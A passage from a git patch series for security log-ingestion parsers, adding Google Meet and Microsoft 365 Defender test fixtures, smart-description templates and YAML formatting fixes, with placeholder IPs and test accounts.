8)\"},{\"name\":\"screencast_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"0\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"8\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"320\"},{\"name\":\"screencast_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"conference_id\",\"value\":\"rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"14874\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"7\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"180\"},{\"name\":\"meeting_code\",\"value\":\"ABCDEFGHIJ\"}]}]}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Google Report",
+        "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T12:07:37.366Z\",\"uniqueQualifier\":\"-3853857772415670247\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"173\"},{\"name\":\"screencast_recv_bitrate_kbps_mean\",\"intValue\":\"61\"},{\"name\":\"location_country\",\"value\":\"FR\"},{\"name\":\"identifier_type\",\"value\":\"device_id\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"0\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"2\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_QGKxiQcCZvF\"},{\"name\":\"device_type\",\"value\":\"meet_hardware\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"screencast_recv_long_side_median_pixels\",\"intValue\":\"1568\"},{\"name\":\"calendar_event_id\",\"value\":\"3ckjqg60dq5j4eu9cgjtdb396c\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"screencast_recv_fps_mean\",\"intValue\":\"29\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"33\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"74\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"udp\"},{\"name\":\"duration_seconds\",\"intValue\":\"15317\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"19\"},{\"name\":\"identifier\",\"value\":\"644e7990-c69d-4e09-8cd2-6ae52406c21c\"},{\"name\":\"location_region\",\"value\":\"Paris\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"2\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"screencast_recv_short_side_median_pixels\",\"intValue\":\"980\"},{\"name\":\"is_external\",\"boolValue\":false},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"ip_address\",\"value\":\"1.2.3.4\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"15316\"},{\"name\":\"display_name\",\"value\":\"OLYMPUS (Paris-106T, 8)\"},{\"name\":\"screencast_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"0\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"8\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"320\"},{\"name\":\"screencast_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"conference_id\",\"value\":\"rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"14874\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"7\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"180\"},{\"name\":\"meeting_code\",\"value\":\"ABCDEFGHIJ\"}]}]}",
+    "event": {
+      "action": "call_ended",
+      "category": [
+        "session"
+      ],
+      "dataset": "admin#reports#activity",
+      "type": [
+        "connection"
+      ]
+    },
+    "@timestamp": "2024-11-14T12:07:37.366000Z",
+    "client": {
+      "geo": {
+        "country_iso_code": "FR",
+        "region_name": "Paris"
+      }
+    },
+    "cloud": {
+      "account": {
+        "id": "C030x4pai"
+      }
+    },
+    "google": {
+      "report": {
+        "meet": {
+          "code": "ABCDEFGHIJ"
+        }
+      }
+    },
+    "network": {
+      "application": "meet",
+      "transport": "udp"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    },
+    "user": {
+      "email": "tt.test@test.fr"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Google Cloud/google-report/tests/test_end_call_no_ip.json b/Google Cloud/google-report/tests/test_end_call_no_ip.json
new file mode 100644
index 000000000..de33d47c4
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_end_call_no_ip.json	
@@ -0,0 +1,44 @@
+{
+  "input": {
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T11:32:12.301Z\",\"uniqueQualifier\":\"-6765941919309710661\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"725\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"13\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_UJtqXZcvBo3\"},{\"name\":\"device_type\",\"value\":\"web\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"video_recv_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"calendar_event_id\",\"value\":\"6cm94j8lp55a9880oj2o0rb3e6\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"3647\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"1158\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"tcp\"},{\"name\":\"duration_seconds\",\"intValue\":\"3651\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"375\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"9\"},{\"name\":\"video_recv_fps_mean\",\"intValue\":\"23\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"98\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"is_external\",\"boolValue\":true},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"3\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"3647\"},{\"name\":\"display_name\",\"value\":\"Yuki\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"3638\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"11\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"conference_id\",\"value\":\"aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"3627\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"105\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"meeting_code\",\"value\":\"BUSOHGFTVB\"}]}]}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Google Report",
+        "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T11:32:12.301Z\",\"uniqueQualifier\":\"-6765941919309710661\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"725\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"13\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_UJtqXZcvBo3\"},{\"name\":\"device_type\",\"value\":\"web\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"video_recv_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"calendar_event_id\",\"value\":\"6cm94j8lp55a9880oj2o0rb3e6\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"3647\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"1158\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"tcp\"},{\"name\":\"duration_seconds\",\"intValue\":\"3651\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"375\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"9\"},{\"name\":\"video_recv_fps_mean\",\"intValue\":\"23\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"98\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"is_external\",\"boolValue\":true},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"3\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"3647\"},{\"name\":\"display_name\",\"value\":\"Yuki\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"3638\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"11\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"conference_id\",\"value\":\"aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"3627\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"105\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"meeting_code\",\"value\":\"BUSOHGFTVB\"}]}]}",
+    "event": {
+      "action": "call_ended",
+      "category": [
+        "session"
+      ],
+      "dataset": "admin#reports#activity",
+      "type": [
+        "connection"
+      ]
+    },
+    "@timestamp": "2024-11-14T11:32:12.301000Z",
+    "cloud": {
+      "account": {
+        "id": "C030x4pai"
+      }
+    },
+    "google": {
+      "report": {
+        "meet": {
+          "code": "BUSOHGFTVB"
+        }
+      }
+    },
+    "network": {
+      "application": "meet",
+      "transport": "tcp"
+    },
+    "user": {
+      "email": "tt.test@test.fr"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Google Cloud/google-report/tests/test_meet_sample1.json b/Google Cloud/google-report/tests/test_meet_sample1.json
index 406a0943c..fd7b1fa66 100644
--- a/Google Cloud/google-report/tests/test_meet_sample1.json	
+++ b/Google Cloud/google-report/tests/test_meet_sample1.json	
@@ -41,13 +41,20 @@
       "transport": "udp"
     },
     "related": {
+      "ip": [
+        "5555:333:333:5555:5555:5555:5555:5555"
+      ],
       "user": [
         "jone.doe"
       ]
     },
+    "source": {
+      "address": "5555:333:333:5555:5555:5555:5555:5555",
+      "ip": "5555:333:333:5555:5555:5555:5555:5555"
+    },
     "user": {
       "domain": "test.com",
-      "email": "jone.doe@test.com",
+      "email": "joe.done@test.com",
       "id": "1098488062555",
       "name": "jone.doe"
     }

From 74e459dd00f628dc287820ee60efef6fb61789ab Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Fri, 22 Nov 2024 10:39:44 +0100
Subject: [PATCH 278/317] Prettier on another parser to pass tests

---
 GateWatcher/aioniq/ingest/parser.yml | 18 +++++++++---------
 1 file changed, 9 insertions(+), 9 deletions(-)

diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml
index 3cc13d747..20c57feb0 100644
--- a/GateWatcher/aioniq/ingest/parser.yml
+++ b/GateWatcher/aioniq/ingest/parser.yml
@@ -206,12 +206,12 @@ stages:
   tls:
     actions:
       - set:
-         tls.server.issuer: "{{json_load.message.tls.issuerdn}}"
-         tls.server.not_before: "{{json_load.message.tls.notbefore}}"
-         tls.server.certificate_chain: "{{json_load.message.tls.chain}}"
-         tls.server.subject: "{{json_load.message.tls.subject}}"
-         gatewatcher.tls: "{{json_load.message.tls}}"
-         gatewatcher.tls_sni: "{{json_load.message.tls.sni}}"
-         gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}"
-         tls.version: "{{json_load.message.tls.version}}"
-         tls.server.not_after: "{{json_load.message.tls.notafter}}"
+          tls.server.issuer: "{{json_load.message.tls.issuerdn}}"
+          tls.server.not_before: "{{json_load.message.tls.notbefore}}"
+          tls.server.certificate_chain: "{{json_load.message.tls.chain}}"
+          tls.server.subject: "{{json_load.message.tls.subject}}"
+          gatewatcher.tls: "{{json_load.message.tls}}"
+          gatewatcher.tls_sni: "{{json_load.message.tls.sni}}"
+          gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}"
+          tls.version: "{{json_load.message.tls.version}}"
+          tls.server.not_after: "{{json_load.message.tls.notafter}}"

From ba631f3d23a2724a148dea4093f6010b3d176331 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Fri, 22 Nov 2024 10:41:05 +0100
Subject: [PATCH 279/317] fix on linting

---
 GateWatcher/aioniq/_meta/fields.yml | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml
index 07bae26e7..8bc01d294 100644
--- a/GateWatcher/aioniq/_meta/fields.yml
+++ b/GateWatcher/aioniq/_meta/fields.yml
@@ -389,16 +389,16 @@ gatewatcher.tls:
   name: gatewatcher.tls
   type: text
 
-gatewatcher.tls_sni:
-  description: This field represents the TLS SNI field in a TLS metadata
-  name: gatewatcher.tls_sni
-  type: text
-
 gatewatcher.tls_fingerprint:
   description: This field represents the TLS server fingerprint field in a TLS metadata
   name: gatewatcher.tls_fingerprint
   type: text
 
+gatewatcher.tls_sni:
+  description: This field represents the TLS SNI field in a TLS metadata
+  name: gatewatcher.tls_sni
+  type: text
+
 gatewatcher.ttp:
   description: This field is used for retrohunt alerts
   name: gatewatcher.ttp

From 97df6b20679a01fb368a3a46dc440ef564086d46 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Fri, 22 Nov 2024 12:07:17 +0100
Subject: [PATCH 280/317] Microsoft 365 defender : fix on smart descriptions

---
 .../_meta/smart-descriptions.json             | 61 ++++++++++++
 .../tests/test_cloud_app4.json                | 63 ++++++++++++
 .../tests/test_device_logon_failed.json       | 98 +++++++++++++++++++
 .../tests/test_email_delivered.json           | 76 ++++++++++++++
 .../tests/test_email_delivered2.json          | 76 ++++++++++++++
 5 files changed, 374 insertions(+)
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_cloud_app4.json
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_email_delivered.json
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_email_delivered2.json

diff --git a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
index 21e3caf3c..6232e66f8 100644
--- a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
+++ b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
@@ -1,4 +1,14 @@
 [
+  {
+    "value": "A new {action.type} cloud app event have been received",
+    "conditions": [
+      {
+        "field": "event.dataset",
+        "value": "cloud_app_events"
+      },
+      { "field": "action.type" }
+    ]
+  },
   {
     "value": "New incident {microsoft.defender.investigation.name}: {email.attachments.file.name} with hash {email.attachments.file.hash.sha256}",
     "conditions": [
@@ -132,6 +142,35 @@
       }
     ]
   },
+  {
+    "value": "{user.domain}\\{user.name} failed to log on {host.name}",
+    "conditions": [
+      {
+        "field": "event.dataset",
+        "value": "device_logon_events"
+      },
+      {
+        "field": "host.name"
+      },
+      {
+        "field": "user.name"
+      },
+      {
+        "field": "user.domain"
+      },
+      {
+        "field": "action.type",
+        "value": "LogonFailed"
+      }
+    ],
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "host.name",
+        "type": "logged on"
+      }
+    ]
+  },
   {
     "value": "{user.domain}\\{user.name} logged on {host.name}",
     "conditions": [
@@ -402,6 +441,28 @@
       { "field": "email.to.address" }
     ]
   },
+  {
+    "value": "{event.action} email from {email.from.address} to {email.to.address}",
+    "conditions": [
+      { "field": "event.dataset", "value": "email_events" },
+      { "field": "email.from.address" },
+      { "field": "email.to.address" }
+    ]
+  },
+  {
+    "value": "{event.action} email from {email.from.address}",
+    "conditions": [
+      { "field": "event.dataset", "value": "email_events" },
+      { "field": "email.from.address" }
+    ]
+  },
+  {
+    "value": "{event.action} email to {email.to.address}",
+    "conditions": [
+      { "field": "event.dataset", "value": "email_events" },
+      { "field": "email.to.address" }
+    ]
+  },
   {
     "value": "{action.type} on {url.original}",
     "conditions": [
diff --git a/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json b/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json
new file mode 100644
index 000000000..86f044fe7
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json
@@ -0,0 +1,63 @@
+{
+  "input": {
+    "message": "{\"time\":\"2024-10-28T14:24:31.9854915Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:20:30.0960000Z\",\"properties\":{\"ActionType\":\"MessageReadReceiptReceived\",\"ApplicationId\":28375,\"AccountDisplayName\":\"John DOE\",\"AccountObjectId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"AccountId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"DeviceType\":null,\"OSPlatform\":null,\"IPAddress\":null,\"IsAnonymousProxy\":null,\"CountryCode\":null,\"City\":null,\"ISP\":null,\"UserAgent\":null,\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Microsoft Team\"},{\"Type\":\"User\",\"Role\":\"Actor\",\"Name\":\"John DOE\",\"Id\":\"abcd1234-1234-1234-1234-abcdef123456\",\"ApplicationId\":11161,\"ApplicationInstance\":0}],\"AdditionalFields\":{},\"ActivityType\":\"Basic\",\"ObjectName\":null,\"ObjectType\":null,\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Regular\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":null,\"IPCategory\":null,\"UserAgentTags\":null,\"RawEventData\":{\"ChatThreadId\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"CommunicationType\":\"GroupChat\",\"CreationTime\":\"2024-10-28T14:18:38Z\",\"ExtraProperties\":[],\"Id\":\"abcd1234-ef09-1234-abcd-123456abcdef\",\"ItemName\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"MessageId\":\"1730125116564\",\"MessageVersion\":\"0\",\"MessageVisibilityTime\":\"2022-09-21T08:33:35Z\",\"Operation\":\"MessageReadReceiptReceived\",\"OrganizationId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"ParticipantInfo\":{\"HasForeignTenantUsers\":false,\"HasGuestUsers\":false,\"HasOtherGuestUsers\":false,\"HasUnauthenticatedUsers\":false,\"ParticipatingDomains\":[],\"ParticipatingSIPDomains\":[],\"ParticipatingTenantIds\":[\"12345678-abcd-ef09-1234-123456abcdef\"]},\"RecordType\":25,\"ResourceTenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"UserId\":\"john.doe@company.fr\",\"UserKey\":\"abcd1234-1234-1234-1234-abcdef123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"},\"ReportId\":\"98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"Application\":\"Microsoft Teams\"},\"Tenant\":\"DefaultTenant\"}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Microsoft 365 Defender",
+        "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"time\":\"2024-10-28T14:24:31.9854915Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:20:30.0960000Z\",\"properties\":{\"ActionType\":\"MessageReadReceiptReceived\",\"ApplicationId\":28375,\"AccountDisplayName\":\"John DOE\",\"AccountObjectId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"AccountId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"DeviceType\":null,\"OSPlatform\":null,\"IPAddress\":null,\"IsAnonymousProxy\":null,\"CountryCode\":null,\"City\":null,\"ISP\":null,\"UserAgent\":null,\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Microsoft Team\"},{\"Type\":\"User\",\"Role\":\"Actor\",\"Name\":\"John DOE\",\"Id\":\"abcd1234-1234-1234-1234-abcdef123456\",\"ApplicationId\":11161,\"ApplicationInstance\":0}],\"AdditionalFields\":{},\"ActivityType\":\"Basic\",\"ObjectName\":null,\"ObjectType\":null,\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Regular\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":null,\"IPCategory\":null,\"UserAgentTags\":null,\"RawEventData\":{\"ChatThreadId\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"CommunicationType\":\"GroupChat\",\"CreationTime\":\"2024-10-28T14:18:38Z\",\"ExtraProperties\":[],\"Id\":\"abcd1234-ef09-1234-abcd-123456abcdef\",\"ItemName\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"MessageId\":\"1730125116564\",\"MessageVersion\":\"0\",\"MessageVisibilityTime\":\"2022-09-21T08:33:35Z\",\"Operation\":\"MessageReadReceiptReceived\",\"OrganizationId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"ParticipantInfo\":{\"HasForeignTenantUsers\":false,\"HasGuestUsers\":false,\"HasOtherGuestUsers\":false,\"HasUnauthenticatedUsers\":false,\"ParticipatingDomains\":[],\"ParticipatingSIPDomains\":[],\"ParticipatingTenantIds\":[\"12345678-abcd-ef09-1234-123456abcdef\"]},\"RecordType\":25,\"ResourceTenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"UserId\":\"john.doe@company.fr\",\"UserKey\":\"abcd1234-1234-1234-1234-abcdef123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"},\"ReportId\":\"98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"Application\":\"Microsoft Teams\"},\"Tenant\":\"DefaultTenant\"}",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "cloud_app_events",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-28T14:18:38Z",
+    "action": {
+      "properties": {
+        "Application": "Microsoft Teams",
+        "ApplicationId": "28375",
+        "IsAdminOperation": "false",
+        "IsExternalUser": false,
+        "IsImpersonated": false,
+        "RawEventData": "{\"ChatThreadId\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"CommunicationType\": \"GroupChat\", \"CreationTime\": \"2024-10-28T14:18:38Z\", \"ExtraProperties\": [], \"Id\": \"abcd1234-ef09-1234-abcd-123456abcdef\", \"ItemName\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"MessageId\": \"1730125116564\", \"MessageVersion\": \"0\", \"MessageVisibilityTime\": \"2022-09-21T08:33:35Z\", \"Operation\": \"MessageReadReceiptReceived\", \"OrganizationId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"ParticipantInfo\": {\"HasForeignTenantUsers\": false, \"HasGuestUsers\": false, \"HasOtherGuestUsers\": false, \"HasUnauthenticatedUsers\": false, \"ParticipatingDomains\": [], \"ParticipatingSIPDomains\": [], \"ParticipatingTenantIds\": [\"12345678-abcd-ef09-1234-123456abcdef\"]}, \"RecordType\": 25, \"ResourceTenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"UserId\": \"john.doe@company.fr\", \"UserKey\": \"abcd1234-1234-1234-1234-abcdef123456\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftTeams\"}"
+      },
+      "type": "MessageReadReceiptReceived"
+    },
+    "microsoft": {
+      "defender": {
+        "activity": {
+          "objects": [
+            {
+              "Role": "Parameter",
+              "ServiceObjectType": "Microsoft Team",
+              "Type": "Structured object"
+            },
+            {
+              "ApplicationId": 11161,
+              "ApplicationInstance": 0,
+              "Id": "abcd1234-1234-1234-1234-abcdef123456",
+              "Name": "John DOE",
+              "Role": "Actor",
+              "Type": "User"
+            }
+          ],
+          "type": "Basic"
+        },
+        "report": {
+          "id": "98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef"
+        }
+      }
+    },
+    "user": {
+      "full_name": "John DOE"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json b/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json
new file mode 100644
index 000000000..1d69ebb63
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json
@@ -0,0 +1,98 @@
+{
+  "input": {
